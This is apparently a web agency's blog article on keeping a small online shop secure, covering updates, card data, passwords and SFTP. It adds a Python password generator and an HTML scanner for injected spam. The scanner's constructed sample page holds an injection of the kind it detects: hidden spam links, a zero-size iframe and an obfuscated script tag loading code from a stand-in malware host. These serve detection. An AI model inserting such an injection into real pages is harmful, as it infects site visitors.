This is a kind of boring article about website security, but this is so important to know that I suggest you just buckle down and read through the whole thing! Then let me know if we can help.
Keeping Your Site Secure
It is your job to keep your site as secure as possible. Especially if you are collecting customer information and credit card data, you need to be as careful as you can to protect your site.
To keep attackers out of your shop admin, your database, and your FTP account, you'll need a strong, unique password for each of them. To keep your site from being hacked, you'll also want to follow good security practices. Here are some things you can do to keep your site secure.
- Keep your site software up to date. This means the program that runs your shop or your blog (such as osCommerce or WordPress), and any plugins, themes or add-ons you've installed with it. When a new version is released, install it right away: it may contain security fixes, and attackers actively scan for sites still running versions with publicly known holes. Check the website for your software occasionally to see what the latest version is, and compare it with the version number you're running. If you're using hosted software, such as Shopify or Big Cartel, they take care of this for you.
- Make sure you don't get spyware or a virus on your own computer. If your computer is infected, hackers can record the passwords you type and anything else about your site, no matter how strong those passwords are. Infections usually come from junk email attachments, or from visiting a website that's been hacked. Two programs you can install to protect your computer are Ad-Aware and Spybot.
Protecting Credit Card Data:
- Set your shopping cart program to delete credit card data as soon as it's been used, rather than storing it on the site. Better still, have customers enter their card details on your payment gateway's page, so the numbers never reach your server at all. Whatever you do, the card security code (the CVV on the back) must never be stored after a payment is authorized; the PCI DSS rules your merchant account agreement binds you to prohibit it.
- If you need to view the credit card number to process payments manually, make sure it's split into two pieces (one in your admin, one emailed to you), so that neither place holds the full number. Keep in mind that email normally travels and sits in mailboxes unencrypted, so the emailed half is still exposed; treat this as a stopgap, and delete those emails as soon as the payment is processed.
- Set up an SSL certificate (so your site is served over https://) if you're accepting credit cards directly from your site. This encrypts the information while it travels between the customer's browser and your server, so it can't be read or altered in transit; it does not protect data once it's stored on the server. You should serve the whole site over https://, not just the checkout: it protects the customer's email and mailing address even if you aren't taking their credit card, and it protects your own admin login, which is where a stolen password does the most damage.
General Good Practices:
- Don't follow links sent in email unless you trust the sender. Never click through on emails that are supposedly from eBay, PayPal, your bank, or a greeting card service unless you're sure they're legitimate; instead, type the site's address into your browser yourself and log in there.
- Don't open email attachments unless you're sure who they're from and you were expecting them.
- Avoid insecure software, and use a safer alternative. For example, use Firefox or Chrome instead of Internet Explorer, and Thunderbird or Gmail instead of Outlook. Whichever you choose, keep it updated; an out-of-date browser is what most drive-by infections exploit.
- If you do find spyware on your computer after running Ad-Aware or Spybot, change your website passwords after removing the offending program, and assume anything you typed while it was installed has been seen.
Make sure all of your passwords are strong passwords. You can use a password generator if you only access your site from one location and don't need to remember the passwords (but can let your browser remember them). If you use a laptop and take it out with you regularly (or use a public computer), it may not be a good idea to let your browser remember passwords, in case your computer is stolen; a password manager that locks everything behind one master password is the safer version of this. Alternately, you can create secure and memorable passwords: several unrelated words strung together is far stronger than a short word with a digit tacked on the end, and easier to remember.
If you log in to your site from any computer other than your own, be sure not to let the browser save your password information. Log out and close the browser when you're done working.
Make sure your FTP password isn't also used for your hosting account, your shop admin, your database, or anything else. Each account should have its own password, so that one leaked password doesn't open all of them.
If you log into your site using FTP, switch to SFTP (which runs over SSH) or FTPS if your host offers it. Plain FTP sends your username, password and every file in clear text, so anyone on the same network (a coffee shop's wifi, say) can read them. Most FTP programs already support SFTP, so often all that changes is the connection type and the port.
Never email your password to anyone! If you have to share it online (with a developer, for example), make sure you're posting it over a secure https:// connection to a site that requires a login for anyone to view the info, and change the password once the work is done.
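As an added example (this is not code from the original article), here is a short Python script that does what the password section above asks for: it generates passwords with the `secrets` module (a cryptographically secure random source, unlike `random`), builds a memorable passphrase from a word list, shows how many bits of strength each method gives, and checks a list of your accounts for a password used in more than one place (FTP, hosting, admin, database). The word list and the account/password pairs are made up for illustration; the entropy figures apply only to randomly generated secrets, not to passwords a person invents.

```python
import math
import secrets
import string

# Characters used for generated passwords: letters, digits and a set of
# punctuation that admin panels and FTP clients generally accept.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{}:,.?"

# Constructed word list for passphrases. It is deliberately tiny so the entropy
# numbers below show why list size matters; a real list such as the EFF long
# word list has 7776 words (about 12.9 bits per word).
WORDS = ["anchor", "basket", "copper", "dragon", "ember", "falcon", "garden",
         "harbor", "island", "jungle", "kettle", "lantern", "meadow", "nickel",
         "orchid", "pepper"]


def generate_password(length=20):
    """Random password drawn with the secrets module (a CSPRNG), never random.random."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def generate_passphrase(words, n_words=5, sep="-"):
    """Memorable alternative: several words picked uniformly at random from a list."""
    return sep.join(secrets.choice(words) for _ in range(n_words))


def entropy_bits(n_symbols, alphabet_size):
    """Strength of a *randomly generated* secret: each symbol adds log2(alphabet) bits.
    This measures the generation process, not a password a person made up."""
    return n_symbols * math.log2(alphabet_size)


def find_reused(passwords):
    """passwords: mapping of account name -> password (e.g. from your own notes).
    Returns the groups of accounts that share one password, so you can fix them."""
    accounts_by_password = {}
    for account, password in passwords.items():
        accounts_by_password.setdefault(password, []).append(account)
    return sorted(sorted(group) for group in accounts_by_password.values()
                  if len(group) > 1)


if __name__ == "__main__":
    print("password  :", generate_password(20),
          f"({entropy_bits(20, len(ALPHABET)):.0f} bits)")
    print("passphrase:", generate_passphrase(WORDS, 5),
          f"({entropy_bits(5, len(WORDS)):.0f} bits from a {len(WORDS)}-word list; "
          f"{entropy_bits(5, 7776):.0f} bits from a 7776-word list)")
    # Constructed example of one password reused across the accounts the article mentions.
    print("reused    :", find_reused({"ftp": "Sunflower1", "hosting": "Sunflower1",
                                      "shop admin": "Tq7!vLp2@zR9#m",
                                      "database": "Sunflower1"}))
```

The passphrase numbers are the point to notice: five words from the 16-word list here give only 20 bits, which is weak, while five words from a 7776-word list give about 65 bits. The words only need to be random, not clever.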
How To Check Your Site For Hacks:
- View the source of your index page in your browser. You can do this by right-clicking your site and choosing "view source." Hackers often insert dozens of spam-type links into the code of your page, usually inside an element styled to be invisible, so they show up in the source but not on the page itself. A big block of links to sites you've never heard of is pretty obvious once you look. It's worth checking a few other pages too, not just the home page.
- If you aren't already signed up for Google Webmaster Tools (now called Google Search Console), I would recommend it, as they check your site for malware and report it back to you.
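Here is the "view source" check above turned into a script, as an added example (not code from the original article). It parses a page's HTML and reports the things an injected page usually contains: links sitting inside an element that's styled to be invisible, iframes with zero size, and a few obfuscation idioms (`eval(base64_decode(`, `document.write(unescape(` and friends) that injected code tends to use. The sample page it scans is constructed for the example, with a legitimate top half and an injected bottom half; the `shop.example` hostname, the `.example` spam domains and the threshold of 10 external links are assumptions, and every hit is a prompt to look, not proof of a hack.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample index page. The part after the comment is what a typical
# spam injection looks like: links pushed off-screen with CSS, a zero-size
# iframe, and a script that writes an obfuscated <script> tag. Not from any real site.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>My Shop</title><link rel="stylesheet" href="/style.css"></head>
<body>
<h1>My Shop</h1>
<a href="/products">Products</a> | <a href="/about">About</a> |
<a href="https://www.paypal.com/">Pay with PayPal</a>
<img src="/logo.png" alt="logo">
<p>Welcome to the shop.</p>
<!-- everything below this comment is the injected part -->
<div style="position:absolute; left:-9999px">
<a href="http://cheap-pills.example/">buy pills</a>
<a href="http://casino-spam.example/">online casino</a>
<a href="http://loans-spam.example/">payday loans</a>
</div>
<iframe src="http://malware.example/load.php" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://malware.example/j.js%22%3E%3C/script%3E'));</script>
</body></html>
"""

# Inline styles that make an element invisible to visitors but not to search engines.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px"
    r"|(?:width|height)\s*:\s*0(?:px)?(?![\d.])", re.I)

# Obfuscation idioms common in injected code. These are heuristics: legitimate
# scripts occasionally use them too, so a hit means "look here", not "hacked".
SUSPICIOUS_CODE = [
    re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    re.compile(r"gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
]

# Elements that never have a closing tag, so they must not affect the nesting stack.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link",
        "meta", "source", "track", "wbr"}

# Above this many links to other domains on one page, flag it for review (assumed threshold).
MAX_EXTERNAL_LINKS = 10


class PageScanner(HTMLParser):
    """Collects links and iframes, remembering whether each sits inside a hidden element."""

    def __init__(self):
        super().__init__()
        self.links = []    # (href, inside_hidden_element)
        self.iframes = []  # (src, hidden_or_zero_size)
        self._hidden = []  # one flag per currently open element

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "a" and a.get("href"):
            self.links.append((a["href"], hidden or any(self._hidden)))
        if tag == "iframe":
            tiny = (a.get("width", "").strip() in {"0", "1"}
                    or a.get("height", "").strip() in {"0", "1"})
            self.iframes.append((a.get("src", ""), tiny or hidden or any(self._hidden)))
        if tag not in VOID:
            self._hidden.append(hidden)

    def handle_endtag(self, tag):
        if tag not in VOID and self._hidden:
            self._hidden.pop()


def is_external(href, site_host):
    """True for links that point at a different site than the one being scanned."""
    host = urlparse(href).netloc.lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def scan_page(html, site_host):
    """Return a list of human-readable findings for one page's HTML source."""
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    hidden_links = [href for href, hidden in scanner.links if hidden]
    if hidden_links:
        findings.append(f"{len(hidden_links)} link(s) hidden from visitors: {hidden_links}")
    external = [href for href, _ in scanner.links if is_external(href, site_host)]
    if len(external) > MAX_EXTERNAL_LINKS:
        findings.append(f"{len(external)} links to other sites (unusual for an index page)")
    for src, suspicious in scanner.iframes:
        if suspicious:
            findings.append(f"hidden or zero-size iframe loading {src}")
    for pattern in SUSPICIOUS_CODE:
        for match in pattern.finditer(html):
            findings.append(f"obfuscated code at character {match.start()}: {match.group(0)!r}")
    return findings


if __name__ == "__main__":
    # To scan your own site, fetch its index page (e.g. with urllib) and pass the HTML here.
    for finding in scan_page(SAMPLE_HTML, "shop.example"):
        print("-", finding)
```

Run against the sample it reports the three hidden spam links, the zero-size iframe and the `document.write(unescape(` script, and nothing for the legitimate links. To use it for real, save the page source from your browser (or fetch it with `urllib.request`) and pass that string to `scan_page` with your own hostname.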
What To Do In Case Of Security Problems:
Change any passwords you can right away (FTP, hosting, database, shop admin), doing it from a computer you know is clean, then contact your web developer to check the site out. Your web developer should be able to fix it and let you know when the attack happened, what info was affected, and how you can prevent similar problems in the future. If there's any chance credit card data was exposed, you'll also need to tell your payment processor.
Get Protected and Stay Protected:
We strongly recommend that you sign up for Sucuri to protect your site. This has proven to be a quick and cost-effective solution for our clients. It's priced per year, and they will monitor your website regularly, allow you to scan it yourself, and (best part!) clean it up for you if your site is hacked.
Savvy creative businesses say they always learn something helpful and interesting when they read our newsletter! You can join them here.